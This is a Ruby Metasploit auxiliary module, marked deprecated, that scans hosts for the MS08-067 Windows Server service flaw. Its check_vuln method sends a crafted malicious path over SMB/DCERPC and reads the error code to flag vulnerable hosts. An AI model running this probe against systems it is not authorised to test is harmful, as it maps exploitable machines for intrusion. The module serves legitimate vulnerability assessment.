121 lines
3.3 KiB
Ruby
121 lines
3.3 KiB
Ruby
##
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require "msf/core"
|
|
require 'msf/core/module/deprecated'
|
|
|
|
class Metasploit4 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::DCERPC
|
|
include Msf::Exploit::Remote::SMB
|
|
include Msf::Auxiliary::Scanner
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Module::Deprecated
|
|
deprecated Date.new(2014, 2, 26), "exploit/windows/smb/ms08_067_netapi"
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => "MS08-067 Scanner",
|
|
'Description' => %q{
|
|
This module uses the check in ms08_067_netapi to scan for MS08-067.
|
|
},
|
|
'Author' => [
|
|
"hdm", # with tons of input/help/testing from the community
|
|
"Brett Moore <brett.moore[at]insomniasec.com>",
|
|
"frank2 <frank2@dc949.org>", # check() detection
|
|
"jduck", # XP SP2/SP3 AlwaysOn DEP bypass
|
|
"sho-luv", # Original module
|
|
"wvu" # Refactor and cleanup
|
|
],
|
|
'References' => [
|
|
["CVE", "2008-4250"],
|
|
["OSVDB", "49243"],
|
|
["MSB", "MS08-067"],
|
|
# If this vulnerability is found, ms08-67 is exposed as well
|
|
["URL", "http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"]
|
|
],
|
|
'License' => MSF_LICENSE
|
|
))
|
|
|
|
register_options([
|
|
OptString.new("SMBPIPE", [true, "The pipe name to use (BROWSER, SRVSVC)", "BROWSER"])
|
|
], self.class)
|
|
end
|
|
|
|
def run_host(ip)
|
|
case check_vuln
|
|
when Msf::Exploit::CheckCode::Vulnerable
|
|
print_good("#{ip}:#{rport} - MS08-067 VULNERABLE")
|
|
report_vuln({
|
|
:host => ip,
|
|
:name => "MS08-067",
|
|
:info => "Vulnerability in Server service could allow remote code execution",
|
|
:refs => self.references
|
|
})
|
|
when Msf::Exploit::CheckCode::Safe
|
|
vprint_status("#{ip}:#{rport} - MS08-067 SAFE")
|
|
when Msf::Exploit::CheckCode::Unknown
|
|
vprint_status("#{ip}:#{rport} - MS08-067 UNKNOWN")
|
|
end
|
|
end
|
|
|
|
def check_vuln
|
|
begin
|
|
connect()
|
|
smb_login()
|
|
rescue Rex::Proto::SMB::Exceptions::LoginError
|
|
return Msf::Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
#
|
|
# Build the malicious path name
|
|
# 5b878ae7 "db @eax;g"
|
|
prefix = "\\"
|
|
path =
|
|
"\x00\\\x00/"*0x10 +
|
|
Rex::Text.to_unicode("\\") +
|
|
Rex::Text.to_unicode("R7") +
|
|
Rex::Text.to_unicode("\\..\\..\\") +
|
|
Rex::Text.to_unicode("R7") +
|
|
"\x00"*2
|
|
|
|
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
|
|
|
|
handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
|
|
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
|
|
)
|
|
|
|
begin
|
|
# Samba doesn't have this handle and returns an ErrorCode
|
|
dcerpc_bind(handle)
|
|
rescue Rex::Proto::SMB::Exceptions::ErrorCode
|
|
return Msf::Exploit::CheckCode::Safe
|
|
end
|
|
|
|
stub =
|
|
NDR.uwstring(server) +
|
|
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
|
|
NDR.long(8) +
|
|
NDR.wstring(prefix) +
|
|
NDR.long(4097) +
|
|
NDR.long(0)
|
|
|
|
resp = dcerpc.call(0x1f, stub)
|
|
error = resp[4,4].unpack("V")[0]
|
|
|
|
# Cleanup
|
|
simple.client.close
|
|
simple.client.tree_disconnect
|
|
disconnect
|
|
|
|
if (error == 0x0052005c) # \R :)
|
|
return Msf::Exploit::CheckCode::Vulnerable
|
|
else
|
|
return Msf::Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
end
|